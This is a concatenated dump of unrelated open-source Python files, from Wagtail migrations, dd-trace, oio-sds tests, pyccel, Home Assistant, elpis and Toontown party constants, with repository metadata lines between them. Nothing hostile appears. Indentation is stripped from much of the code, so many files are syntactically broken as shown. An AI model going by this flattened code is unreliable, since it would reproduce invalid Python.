models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_pages",
to="wagtailcore.Workflow",
verbose_name="workflow",
),
),
],
options={
"verbose_name": "workflow page",
"verbose_name_plural": "workflow pages",
},
),
migrations.AddField(
model_name="taskstate",
name="workflow_state",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="task_states",
to="wagtailcore.WorkflowState",
verbose_name="workflow state",
),
),
migrations.CreateModel(
name="WorkflowTask",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
(
"sort_order",
models.IntegerField(blank=True, editable=False, null=True),
),
(
"task",
models.ForeignKey(
limit_choices_to={"active": True},
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_tasks",
to="wagtailcore.Task",
verbose_name="task",
),
),
(
"workflow",
modelcluster.fields.ParentalKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="workflow_tasks",
to="wagtailcore.Workflow",
verbose_name="workflow_tasks",
),
),
],
options={
"verbose_name": "workflow task order",
"verbose_name_plural": "workflow task orders",
"ordering": ["sort_order"],
"abstract": False,
"unique_together": {("workflow", "task")},
},
),
migrations.AddConstraint(
model_name="workflowstate",
constraint=models.UniqueConstraint(
condition=models.Q(status="in_progress"),
fields=("page",),
name="unique_in_progress_workflow",
),
),
migrations.AddField(
model_name="groupapprovaltask",
name="groups",
field=models.ManyToManyField(
help_text="Pages/snippets at this step in a workflow will be moderated or approved by these groups of users",
to="auth.Group",
verbose_name="groups",
),
),
]
# ===== PacktPublishing/Python-Parallel-Programming-Cookbook-Second-Edition :: Chapter03/process_pool.py (MIT, Python) =====
# Using a Process Pool – Chapter 3: Process Based Parallelism
import multiprocessing
def function_square(data):
result = data*data
return result
if __name__ == '__main__':
inputs = list(range(0,100))
pool = multiprocessing.Pool(processes=4)
pool_outputs = pool.map(function_square, inputs)
pool.close()
pool.join()
    print('Pool :', pool_outputs)
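# Pool.map preserves the input order even though the work is spread across
# four worker processes, so the expected output is:
# Pool : [0, 1, 4, 9, 16, ..., 9801]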
# ===== DataDog/dd-trace-py :: ddtrace/contrib/asyncio/provider.py (Apache-2.0 / BSD-3-Clause, Python) =====
import asyncio
from ...provider import BaseContextProvider
from ...provider import DatadogContextMixin
from ...span import Span
class AsyncioContextProvider(BaseContextProvider, DatadogContextMixin):
"""Manages the active context for asyncio execution. Framework
    instrumentation that is built on top of the ``asyncio`` library should
use this provider when contextvars are not available (Python versions
less than 3.7).
    This context provider falls back to the behavior of its base provider
    when the ``Context`` is propagated to a different thread than the one
    that is running the async loop.
"""
# Task attribute used to set/get the context
_CONTEXT_ATTR = "__datadog_context"
def activate(self, context, loop=None):
"""Sets the scoped ``Context`` for the current running ``Task``."""
loop = self._get_loop(loop)
if not loop:
super(AsyncioContextProvider, self).activate(context)
return context
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task:
setattr(task, self._CONTEXT_ATTR, context)
return context
def _get_loop(self, loop=None):
"""Helper to try and resolve the current loop"""
try:
return loop or asyncio.get_event_loop()
except RuntimeError:
            # Detects if a loop is available in the current thread;
            # DEV: This happens when a new thread is created from the one that is running the async loop
            # DEV: It's possible that a different Executor is handling a different Thread that
            # works with blocking code. In that case, we fall back to a thread-local Context.
pass
return None
def _has_active_context(self, loop=None):
"""Helper to determine if we have a currently active context"""
loop = self._get_loop(loop=loop)
if loop is None:
return super(AsyncioContextProvider, self)._has_active_context()
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task is None:
return False
ctx = getattr(task, self._CONTEXT_ATTR, None)
return ctx is not None
def active(self, loop=None):
"""Returns the active context for the execution."""
loop = self._get_loop(loop=loop)
if not loop:
return super(AsyncioContextProvider, self).active()
# the current unit of work (if tasks are used)
task = asyncio.Task.current_task(loop=loop)
if task is None:
return None
ctx = getattr(task, self._CONTEXT_ATTR, None)
if isinstance(ctx, Span):
return self._update_active(ctx)
return ctx
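# Hedged usage sketch (illustrative, not from dd-trace-py docs): a framework
# would typically install this provider on the global tracer. Tracer.configure
# does accept a ``context_provider`` argument, but treat the exact wiring below
# as an assumption of this sketch rather than documented API.
#     from ddtrace import tracer
#     tracer.configure(context_provider=AsyncioContextProvider())
#     async def handler():
#         with tracer.trace("web.request"):
#             ...  # spans created here attach to the current Task's context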
|
08fffad0afc340e5644b31dada523cc73382bdf2
|
4c4deee160ee4a3056b2973f6202e5cbaafb5925
|
/tests/functional/crawler/test_integrity_crawler.py
|
d856d5750d17780f89398c3808632309efe5c967
|
[
"AGPL-3.0-only",
"LGPL-3.0-only"
] |
permissive
|
open-io/oio-sds
|
b9bc7cec283838a59b83b5279cb181cded69034f
|
08abd65aac86e47cf324826487ab9b475e014938
|
refs/heads/master
| 2023-09-05T05:09:29.653325
| 2023-08-01T16:37:37
| 2023-08-31T16:05:19
| 32,169,193
| 663
| 121
|
MIT
| 2022-03-04T13:08:03
| 2015-03-13T17:06:25
|
Python
|
UTF-8
|
Python
| false
| false
| 5,659
|
py
|
test_integrity_crawler.py
|
# Copyright (C) 2019 OpenIO SAS, as part of OpenIO SDS
# Copyright (C) 2022 OVH SAS
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3.0 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library.
import tempfile
import fileinput
import os
from oio.common import exceptions
from oio.common.utils import cid_from_name, request_id
from oio.crawler.integrity import Checker, Target, DEFAULT_DEPTH, IRREPARABLE_PREFIX
from oio.event.evob import EventTypes
from tests.utils import BaseTestCase, random_str
class TestIntegrityCrawler(BaseTestCase):
def setUp(self):
super(TestIntegrityCrawler, self).setUp()
self.container = "ct-" + random_str(8)
self.obj = "obj-" + random_str(8)
self.account = "test-integrity-" + random_str(8)
self.beanstalkd0.drain_tube("oio-preserved")
reqid = request_id()
self.storage.object_create(
self.account, self.container, obj_name=self.obj, data="chunk", reqid=reqid
)
_, self.rebuild_file = tempfile.mkstemp()
self.checker = Checker(self.ns, rebuild_file=self.rebuild_file)
self.meta, chunks = self.storage.object_locate(
self.account, self.container, self.obj
)
self.chunk = chunks[0]
self.irreparable = len(chunks) == 1
self.storage.blob_client.chunk_delete(self.chunk["real_url"])
self.wait_for_event(
"oio-preserved",
reqid=reqid,
fields={"account": self.account, "user": self.container},
types=[EventTypes.CONTAINER_STATE],
)
def tearDown(self):
super(TestIntegrityCrawler, self).tearDown()
os.remove(self.rebuild_file)
self.storage.container_flush(self.account, self.container)
self.storage.container_delete(self.account, self.container)
self.wait_for_event(
"oio-preserved",
types=[EventTypes.CONTAINER_DELETED],
fields={"user": self.container},
)
try:
self.storage.account_delete(self.account)
except exceptions.Conflict:
pass # Yes I know, that's not supposed to fail, but...
def _verify_rebuilder_input(self):
try:
line = next(fileinput.input(self.rebuild_file)).strip()
cid = cid_from_name(self.account, self.container)
expected = "|".join(
[
cid,
self.meta["id"],
self.meta["name"],
self.meta["version"],
self.chunk["url"],
]
)
if self.irreparable:
expected = IRREPARABLE_PREFIX + "|" + expected
self.assertEqual(expected, line)
finally:
fileinput.close()
def test_account_rebuilder_output(self):
self.checker.check(Target(self.account), recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_container_rebuilder_output(self):
self.checker.check(
Target(self.account, container=self.container), recurse=DEFAULT_DEPTH
)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_object_rebuilder_output(self):
self.checker.check(
Target(self.account, container=self.container, obj=self.obj),
recurse=DEFAULT_DEPTH,
)
for _ in self.checker.run():
pass
self.checker.fd.flush()
self._verify_rebuilder_input()
def test_object_rebuilder_output_with_confirmations(self):
"""
Check that chunk targets showing errors are reported only after
the right number of confirmations.
"""
self.checker.required_confirmations = 2
tgt = Target(
self.account,
container=self.container,
obj=self.obj,
content_id=self.meta["id"],
version=self.meta["version"],
)
self.checker.check(tgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is empty
self.assertRaises(StopIteration, self._verify_rebuilder_input)
self.assertIn(repr(tgt), self.checker.delayed_targets)
# 1st confirmation
for dtgt in self.checker.delayed_targets.values():
self.checker.check(dtgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is empty
self.assertRaises(StopIteration, self._verify_rebuilder_input)
self.assertIn(repr(tgt), self.checker.delayed_targets)
# 2nd confirmation
for dtgt in self.checker.delayed_targets.values():
self.checker.check(dtgt, recurse=DEFAULT_DEPTH)
for _ in self.checker.run():
pass
self.checker.fd.flush()
# File is NOT empty
self._verify_rebuilder_input()
self.assertNotIn(repr(tgt), self.checker.delayed_targets)
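# Hedged sketch (not part of the test suite): the rebuild file written by the
# Checker holds one "|"-separated record per bad chunk, optionally prefixed
# with IRREPARABLE_PREFIX, mirroring _verify_rebuilder_input above.
# `parse_rebuild_line` is a hypothetical helper shown for illustration.
def parse_rebuild_line(line):
    line = line.strip()
    irreparable = line.startswith(IRREPARABLE_PREFIX + "|")
    if irreparable:
        line = line[len(IRREPARABLE_PREFIX) + 1:]
    cid, content_id, name, version, chunk_url = line.split("|")
    return irreparable, cid, content_id, name, version, chunk_url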
|
5c49a0d301fd4875a6eefcef521d2271cbccba12
|
e8b38b8dfa348ff006eb197a7906ca8e491a23dc
|
/tests/pyccel/scripts/array_binary_operation.py
|
652e53bb716ca2e17a50a8ba717cd6ba582370f5
|
[
"MIT"
] |
permissive
|
pyccel/pyccel
|
d79a81dbdff1172839a6a1227abfcc1f97e6c97b
|
1896b761ba662c90b14c195bbb6eb5cddc57cbfc
|
refs/heads/devel
| 2023-08-30T12:15:25.244401
| 2023-08-28T09:31:32
| 2023-08-28T09:31:32
| 100,463,736
| 307
| 39
|
MIT
| 2023-09-14T19:29:26
| 2017-08-16T07:59:14
|
Python
|
UTF-8
|
Python
| false
| false
| 2,928
|
py
|
array_binary_operation.py
|
# pylint: disable=missing-function-docstring, missing-module-docstring
import numpy as np
def my_pow(n : 'int', m : 'int'):
return n ** m
def array_func_mult():
arr = np.array([1,2,3,4])
arr1 = arr * my_pow(2, 3)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_func_div():
arr = np.array([1,2,3,4])
arr1 = arr / my_pow(2, 3)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_1():
arr = np.array([1,2,3,4])
arr1 = np.array(arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_2():
arr = np.array([1,2,3,4])
arr1 = np.array(arr / 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_3():
arr = np.array([1,2,3,4])
arr1 = np.array(arr * my_pow(2, 2))
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_4():
arr = np.array([1,2,3,4])
arr1 = np.array(arr / my_pow(2, 2) + arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_5():
arr = np.array([1,2,3,4])
arr1 = np.where(arr > 5, arr, (arr * 2) + arr)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_6():
arr = np.array([1,2,3,4])
arr1 = np.where(arr < 5, arr / 2, arr * 2)
shape = np.shape(arr1)
return arr[0], arr1[0], len(shape), shape[0]
def array_arithmetic_op_func_call_7():
arr = np.array([1,2,3,4])
arr1 = np.array([4,3,2,1])
arr2 = np.array(arr + arr1)
shape = np.shape(arr2)
return arr[0], arr2[0], len(shape), shape[0]
def array_arithmetic_op_func_call_8():
arr = np.array([1,2,3,4])
arr1 = np.array([4,3,2,1])
arr2 = np.array(arr - arr1)
shape = np.shape(arr2)
return arr[0], arr2[0], len(shape), shape[0]
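# Hedged sanity check (not part of the pyccel test script): under plain
# CPython the functions above can be compared against a direct NumPy
# computation. `check_mult` is a hypothetical helper shown for illustration.
def check_mult():
    arr = np.array([1, 2, 3, 4])
    expected = arr * my_pow(2, 3)  # 2 ** 3 == 8, so expected == [8, 16, 24, 32]
    a0, a1_0, ndim, n = array_func_mult()
    assert (a0, a1_0, ndim, n) == (arr[0], expected[0], 1, 4)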
if __name__ == "__main__":
a_0, a1_0, ls_0, s_0 = array_func_mult()
print(a_0, a1_0, ls_0, s_0)
a_1, a1_1, ls_1, s_1 = array_func_div()
print(a_1, a1_1, ls_1, s_1)
a_2, a1_2, ls_2, s_2 = array_arithmetic_op_func_call_1()
print(a_2, a1_2, ls_2, s_2)
a_3, a1_3, ls_3, s_3 = array_arithmetic_op_func_call_2()
print(a_3, a1_3, ls_3, s_3)
a_4, a1_4, ls_4, s_4 = array_arithmetic_op_func_call_3()
print(a_4, a1_4, ls_4, s_4)
a_5, a1_5, ls_5, s_5 = array_arithmetic_op_func_call_4()
print(a_5, a1_5, ls_5, s_5)
a_6, a1_6, ls_6, s_6 = array_arithmetic_op_func_call_5()
print(a_6, a1_6, ls_6, s_6)
a_7, a1_7, ls_7, s_7 = array_arithmetic_op_func_call_6()
print(a_7, a1_7, ls_7, s_7)
a_8, a1_8, ls_8, s_8 = array_arithmetic_op_func_call_7()
print(a_8, a1_8, ls_8, s_8)
a_9, a1_9, ls_9, s_9 = array_arithmetic_op_func_call_8()
print(a_9, a1_9, ls_9, s_9)
|
f3629e590412fb6edb8ee7aa9cb082753222e4a6
|
96dcea595e7c16cec07b3f649afd65f3660a0bad
|
/homeassistant/components/ue_smart_radio/media_player.py
|
7fc727cf9fea1a8cee9dc1cb0c97e8f2670ae9de
|
[
"Apache-2.0"
] |
permissive
|
home-assistant/core
|
3455eac2e9d925c92d30178643b1aaccf3a6484f
|
80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743
|
refs/heads/dev
| 2023-08-31T15:41:06.299469
| 2023-08-31T14:50:53
| 2023-08-31T14:50:53
| 12,888,993
| 35,501
| 20,617
|
Apache-2.0
| 2023-09-14T21:50:15
| 2013-09-17T07:29:48
|
Python
|
UTF-8
|
Python
| false
| false
| 6,049
|
py
|
media_player.py
|
"""Support for Logitech UE Smart Radios."""
from __future__ import annotations
import logging
import requests
import voluptuous as vol
from homeassistant.components.media_player import (
PLATFORM_SCHEMA,
MediaPlayerEntity,
MediaPlayerEntityFeature,
MediaPlayerState,
MediaType,
)
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import HomeAssistant
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType, DiscoveryInfoType
_LOGGER = logging.getLogger(__name__)
ICON = "mdi:radio"
URL = "http://decibel.logitechmusic.com/jsonrpc.js"
PLAYBACK_DICT = {
"play": MediaPlayerState.PLAYING,
"pause": MediaPlayerState.PAUSED,
"stop": MediaPlayerState.IDLE,
}
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{vol.Required(CONF_USERNAME): cv.string, vol.Required(CONF_PASSWORD): cv.string}
)
def send_request(payload, session):
"""Send request to radio."""
try:
request = requests.post(
URL,
cookies={"sdi_squeezenetwork_session": session},
json=payload,
timeout=5,
)
except requests.exceptions.Timeout:
_LOGGER.error("Timed out when sending request")
except requests.exceptions.ConnectionError:
_LOGGER.error("An error occurred while connecting")
else:
return request.json()
def setup_platform(
hass: HomeAssistant,
config: ConfigType,
add_entities: AddEntitiesCallback,
discovery_info: DiscoveryInfoType | None = None,
) -> None:
"""Set up the Logitech UE Smart Radio platform."""
email = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
session_request = requests.post(
"https://www.uesmartradio.com/user/login",
data={"email": email, "password": password},
timeout=5,
)
session = session_request.cookies["sdi_squeezenetwork_session"]
player_request = send_request({"params": ["", ["serverstatus"]]}, session)
players = [
UERadioDevice(session, player["playerid"], player["name"])
for player in player_request["result"]["players_loop"]
]
add_entities(players)
class UERadioDevice(MediaPlayerEntity):
"""Representation of a Logitech UE Smart Radio device."""
_attr_icon = ICON
_attr_media_content_type = MediaType.MUSIC
_attr_supported_features = (
MediaPlayerEntityFeature.PLAY
| MediaPlayerEntityFeature.PAUSE
| MediaPlayerEntityFeature.STOP
| MediaPlayerEntityFeature.PREVIOUS_TRACK
| MediaPlayerEntityFeature.NEXT_TRACK
| MediaPlayerEntityFeature.TURN_ON
| MediaPlayerEntityFeature.TURN_OFF
| MediaPlayerEntityFeature.VOLUME_SET
| MediaPlayerEntityFeature.VOLUME_MUTE
)
def __init__(self, session, player_id, player_name):
"""Initialize the Logitech UE Smart Radio device."""
self._session = session
self._player_id = player_id
self._attr_name = player_name
self._attr_volume_level = 0
self._last_volume = 0
def send_command(self, command):
"""Send command to radio."""
send_request(
{"method": "slim.request", "params": [self._player_id, command]},
self._session,
)
def update(self) -> None:
"""Get the latest details from the device."""
request = send_request(
{
"method": "slim.request",
"params": [
self._player_id,
["status", "-", 1, "tags:cgABbehldiqtyrSuoKLN"],
],
},
self._session,
)
if request["error"] is not None:
self._attr_state = None
return
if request["result"]["power"] == 0:
self._attr_state = MediaPlayerState.OFF
else:
self._attr_state = PLAYBACK_DICT[request["result"]["mode"]]
media_info = request["result"]["playlist_loop"][0]
self._attr_volume_level = request["result"]["mixer volume"] / 100
self._attr_media_image_url = media_info["artwork_url"]
self._attr_media_title = media_info["title"]
if "artist" in media_info:
self._attr_media_artist = media_info["artist"]
else:
self._attr_media_artist = media_info.get("remote_title")
@property
def is_volume_muted(self) -> bool:
"""Boolean if volume is currently muted."""
return self.volume_level is not None and self.volume_level <= 0
def turn_on(self) -> None:
"""Turn on specified media player or all."""
self.send_command(["power", 1])
def turn_off(self) -> None:
"""Turn off specified media player or all."""
self.send_command(["power", 0])
def media_play(self) -> None:
"""Send the media player the command for play/pause."""
self.send_command(["play"])
def media_pause(self) -> None:
"""Send the media player the command for pause."""
self.send_command(["pause"])
def media_stop(self) -> None:
"""Send the media player the stop command."""
self.send_command(["stop"])
def media_previous_track(self) -> None:
"""Send the media player the command for prev track."""
self.send_command(["button", "rew"])
def media_next_track(self) -> None:
"""Send the media player the command for next track."""
self.send_command(["button", "fwd"])
def mute_volume(self, mute: bool) -> None:
"""Send mute command."""
if mute:
self._last_volume = self.volume_level
self.send_command(["mixer", "volume", 0])
else:
self.send_command(["mixer", "volume", self._last_volume * 100])
def set_volume_level(self, volume: float) -> None:
"""Set volume level, range 0..1."""
self.send_command(["mixer", "volume", volume * 100])
|
fb3426adc951ea2cd0cbc454de06b576838ca701
|
100bfa827dacb23637d3dd2d1396a830c7d9a4b2
|
/mode/examples/Contributed Libraries in Python/OpenCV/BackgroundSubtraction/BackgroundSubtraction.pyde
|
1a3fc9440555b5d1f6548a705cb0d63650dc7ce1
|
[
"Apache-2.0"
] |
permissive
|
jdf/processing.py
|
82b37e5b1f4ce68825b5fe919205362ecdc16993
|
f38544c70892c7534f059e8acc1c9a492e2b7c86
|
refs/heads/master
| 2023-08-26T01:42:50.442853
| 2023-02-15T21:33:12
| 2023-02-15T21:33:12
| 833,574
| 1,399
| 246
|
Apache-2.0
| 2023-02-21T12:28:09
| 2010-08-12T14:29:22
|
Python
|
UTF-8
|
Python
| false
| false
| 572
|
pyde
|
BackgroundSubtraction.pyde
|
add_library('video')
add_library('opencv_processing')
video = None
opencv = None
def setup():
    global video, opencv  # rebind the module-level handles, not new locals
    size(720, 480, P2D)
    video = Movie(this, "street.mov")
opencv = OpenCV(this, 720, 480)
opencv.startBackgroundSubtraction(5, 3, 0.5)
video.loop()
video.play()
def draw():
image(video, 0, 0)
opencv.loadImage(video)
opencv.updateBackground()
opencv.dilate()
opencv.erode()
noFill()
stroke(255, 0, 0)
strokeWeight(3)
for contour in opencv.findContours():
contour.draw()
def movieEvent(m):
m.read()
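# Hedged extension (not in the original example): contours can be filtered by
# area before drawing to suppress small noise blobs. Contour.area() exists in
# the opencv_processing library; the 50-pixel threshold is an arbitrary choice.
#     for contour in opencv.findContours():
#         if contour.area() > 50:
#             contour.draw()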
|
65c6b120f5d38d960ad682ea1c0d72b0cd0959f4
|
da769d44cfb931914ff51c0f1f302b056837c388
|
/elpis/engines/common/input/resample.py
|
b45f07b6434708b8c264fef11e5438ca36ae6e36
|
[
"Apache-2.0"
] |
permissive
|
CoEDL/elpis
|
d7ef5d8c5daf450df10ca57371291d953555eaa7
|
9a019483b4440a96f80486142fb53c7b95c8f983
|
refs/heads/master
| 2023-07-08T05:06:13.276450
| 2023-03-09T00:17:37
| 2023-03-09T00:17:37
| 154,595,187
| 142
| 40
|
Apache-2.0
| 2023-09-05T09:41:13
| 2018-10-25T02:00:37
|
Python
|
UTF-8
|
Python
| false
| false
| 432
|
py
|
resample.py
|
import subprocess
from ..utilities.globals import SOX_PATH
from pathlib import Path
def resample(src_path: Path, dst_path: Path):
src_path = Path(src_path)
dst_path = Path(dst_path)
sox_arguments = [
SOX_PATH,
f"{src_path}",
"-b",
"16",
"-c",
"1",
"-r",
"16k",
"-t",
"wav",
f"{dst_path}",
]
subprocess.call(sox_arguments)
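# Hedged usage sketch (not part of elpis): convert a source recording into the
# 16 kHz, mono, 16-bit WAV layout the pipeline expects. Paths are placeholders.
#     resample(Path("recordings/session1.wav"), Path("processed/session1.wav"))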
|
33447977a7bb2a40fce92716bcc1c9ceb19cb889
|
da1721d2783ea4d67ff4e73cee6eee71292f2ef7
|
/toontown/parties/PartyGlobals.py
|
895e54a7b43b27c388be9242609465e090ac2e0b
|
[
"BSD-3-Clause"
] |
permissive
|
open-toontown/open-toontown
|
bbdeb1b7bf0fb2861eba2df5483738c0112090ca
|
464c2d45f60551c31397bd03561582804e760b4a
|
refs/heads/develop
| 2023-07-07T01:34:31.959657
| 2023-05-30T23:49:10
| 2023-05-30T23:49:10
| 219,221,570
| 143
| 104
|
BSD-3-Clause
| 2023-09-11T09:52:34
| 2019-11-02T22:24:38
|
Python
|
UTF-8
|
Python
| false
| false
| 37,853
|
py
|
PartyGlobals.py
|
from panda3d.core import BitMask32
from panda3d.core import Point3, VBase4
from toontown.toonbase import TTLocalizer
from enum import IntEnum
KICK_TO_PLAYGROUND_EVENT = 'parties_kickToPlayground'
MaxSetInvites = 1000
MaxSetPartiesInvitedTo = 100
MaxSetHostedParties = 50
MaxPlannedYear = 2030
MinPlannedYear = 1975
JellybeanMultiplier = 1.5
JellyBeanDayMultiplier = 2
PARTY_DURATION = 1800.0
EventsPageGuestNameMaxWidth = 0.42
EventsPageGuestNameMaxLetters = 18
EventsPageHostNameMaxWidth = 0.37
PartyRefundPercentage = 0.95
PartyPlannerAsapMinuteRounding = 5
UberdogCheckPartyStartFrequency = 5.0
UberdogPurgePartyPeriod = 24.0
UberdogPartiesSanityCheckFrequency = 60
JarLabelTextColor = (0.95,
0.95,
0.0,
1.0)
JarLabelMaxedTextColor = (1.0,
0.0,
0.0,
1.0)
TuftsOfGrass = 75
MaxToonsAtAParty = 20
DefaultPartyDuration = 0.5
DelayBeforeAutoKick = 30.0
MaxHostedPartiesPerToon = 1
PartyEditorGridBounds = ((-0.11, 0.289), (0.55, -0.447))
PartyEditorGridCenter = (PartyEditorGridBounds[0][0] + (PartyEditorGridBounds[1][0] - PartyEditorGridBounds[0][0]) / 2.0, PartyEditorGridBounds[1][1] + (PartyEditorGridBounds[0][1] - PartyEditorGridBounds[1][1]) / 2.0)
PartyEditorGridSize = (18, 15)
PartyEditorGridSquareSize = ((PartyEditorGridBounds[1][0] - PartyEditorGridBounds[0][0]) / float(PartyEditorGridSize[0]), (PartyEditorGridBounds[0][1] - PartyEditorGridBounds[1][1]) / float(PartyEditorGridSize[1]))
PartyEditorGridRotateThreshold = 0.08
AvailableGridSquares = 202
TrashCanPosition = (-0.24, 0.0, -0.65)
TrashCanScale = 0.7
PartyEditorTrashBounds = ((-0.16, -0.38), (-0.05, -0.56))
ActivityRequestStatus = IntEnum('ActivityRequestStatus', ('Joining', 'Exiting'), start=0)
InviteStatus = IntEnum('InviteStatus', ('NotRead',
'ReadButNotReplied',
'Accepted',
'Rejected'), start=0)
InviteTheme = IntEnum('InviteTheme', ('Birthday',
'GenericMale',
'GenericFemale',
'Racing',
'Valentoons',
'VictoryParty',
'Winter'), start=0)
PartyStatus = IntEnum('PartyStatus', ('Pending',
'Cancelled',
'Finished',
'CanStart',
'Started',
'NeverStarted'), start=0)
AddPartyErrorCode = IntEnum('AddPartyErrorCode', ('AllOk',
'ValidationError',
'DatabaseError',
'TooManyHostedParties'), start=0)
ChangePartyFieldErrorCode = IntEnum('ChangePartyFieldErrorCode', ('AllOk',
'ValidationError',
'DatabaseError',
'AlreadyStarted',
'AlreadyRefunded'), start=0)
ActivityTypes = IntEnum('ActivityTypes', ('HostInitiated', 'GuestInitiated', 'Continuous'), start=0)
PartyGateDenialReasons = IntEnum('PartyGateDenialReasons', ('Unavailable', 'Full'), start=0)
ActivityIds = IntEnum('ActivityIds', ('PartyJukebox',
'PartyCannon',
'PartyTrampoline',
'PartyCatch',
'PartyDance',
'PartyTugOfWar',
'PartyFireworks',
'PartyClock',
'PartyJukebox40',
'PartyDance20',
'PartyCog',
'PartyVictoryTrampoline',
'PartyWinterCatch',
'PartyWinterTrampoline',
'PartyWinterCog',
'PartyValentineDance',
'PartyValentineDance20',
'PartyValentineJukebox',
'PartyValentineJukebox40',
'PartyValentineTrampoline'), start=0)
PartyEditorActivityOrder = [ActivityIds.PartyCog,
ActivityIds.PartyWinterCog,
ActivityIds.PartyJukebox,
ActivityIds.PartyJukebox40,
ActivityIds.PartyValentineJukebox,
ActivityIds.PartyValentineJukebox40,
ActivityIds.PartyCannon,
ActivityIds.PartyTrampoline,
ActivityIds.PartyValentineTrampoline,
ActivityIds.PartyVictoryTrampoline,
ActivityIds.PartyWinterTrampoline,
ActivityIds.PartyCatch,
ActivityIds.PartyWinterCatch,
ActivityIds.PartyDance,
ActivityIds.PartyDance20,
ActivityIds.PartyValentineDance,
ActivityIds.PartyValentineDance20,
ActivityIds.PartyTugOfWar,
ActivityIds.PartyFireworks,
ActivityIds.PartyClock]
UnreleasedActivityIds = ()
MutuallyExclusiveActivities = ((ActivityIds.PartyJukebox, ActivityIds.PartyJukebox40),
(ActivityIds.PartyValentineJukebox, ActivityIds.PartyValentineJukebox40),
(ActivityIds.PartyDance, ActivityIds.PartyDance20),
(ActivityIds.PartyValentineDance, ActivityIds.PartyValentineDance20))
VictoryPartyActivityIds = frozenset([ActivityIds.PartyVictoryTrampoline])
VictoryPartyReplacementActivityIds = frozenset([ActivityIds.PartyTrampoline])
WinterPartyActivityIds = frozenset([ActivityIds.PartyWinterCatch, ActivityIds.PartyWinterTrampoline, ActivityIds.PartyWinterCog])
WinterPartyReplacementActivityIds = frozenset([ActivityIds.PartyCatch, ActivityIds.PartyTrampoline, ActivityIds.PartyCog])
ValentinePartyActivityIds = frozenset([ActivityIds.PartyValentineDance,
ActivityIds.PartyValentineDance20,
ActivityIds.PartyValentineJukebox,
ActivityIds.PartyValentineJukebox40,
ActivityIds.PartyValentineTrampoline])
ValentinePartyReplacementActivityIds = frozenset([ActivityIds.PartyDance,
ActivityIds.PartyDance20,
ActivityIds.PartyJukebox,
ActivityIds.PartyJukebox40,
ActivityIds.PartyTrampoline])
DecorationIds = IntEnum('DecorationIds', ('BalloonAnvil',
'BalloonStage',
'Bow',
'Cake',
'Castle',
'GiftPile',
'Horn',
'MardiGras',
'NoiseMakers',
'Pinwheel',
'GagGlobe',
'BannerJellyBean',
'CakeTower',
'HeartTarget',
'HeartBanner',
'FlyingHeart',
'Hydra',
'BannerVictory',
'CannonVictory',
'CogStatueVictory',
'TubeCogVictory',
'CogIceCreamVictory',
'cogIceCreamWinter',
'StageWinter',
'CogStatueWinter',
'snowman',
'snowDoodle',
'BalloonAnvilValentine'), start=0)
DECORATION_VOLUME = 1.0
DECORATION_CUTOFF = 45
VictoryPartyDecorationIds = frozenset([DecorationIds.Hydra,
DecorationIds.BannerVictory,
DecorationIds.CannonVictory,
DecorationIds.CogStatueVictory,
DecorationIds.TubeCogVictory,
DecorationIds.CogIceCreamVictory])
WinterPartyDecorationIds = frozenset([DecorationIds.cogIceCreamWinter,
DecorationIds.StageWinter,
DecorationIds.CogStatueWinter,
DecorationIds.snowman,
DecorationIds.snowDoodle])
VictoryPartyReplacementDecorationIds = frozenset([DecorationIds.BannerJellyBean])
ValentinePartyDecorationIds = frozenset([DecorationIds.BalloonAnvilValentine,
DecorationIds.HeartBanner,
DecorationIds.HeartTarget,
DecorationIds.FlyingHeart])
ValentinePartyReplacementDecorationIds = frozenset([DecorationIds.BalloonAnvil, DecorationIds.BannerJellyBean])
UnreleasedDecorationIds = ()
GoToPartyStatus = IntEnum('GoToPartyStatus', ('AllowedToGo',
'PartyFull',
'PrivateParty',
'PartyOver',
'PartyNotActive'), start=0)
PlayGroundToPartyClockColors = {'the_burrrgh': (53.0 / 255.0,
116.0 / 255.0,
148.0 / 255.0,
1.0),
'daisys_garden': (52.0 / 255.0,
153.0 / 255.0,
95.0 / 255.0,
1.0),
'donalds_dock': (60.0 / 255.0,
98.0 / 255.0,
142.0 / 255.0,
1.0),
'donalds_dreamland': (79.0 / 255.0,
92.0 / 255.0,
120.0 / 255.0,
1.0),
'minnies_melody_land': (128.0 / 255.0,
62.0 / 255.0,
142.0 / 255.0,
1.0),
'toontown_central': (77.0 / 255.0,
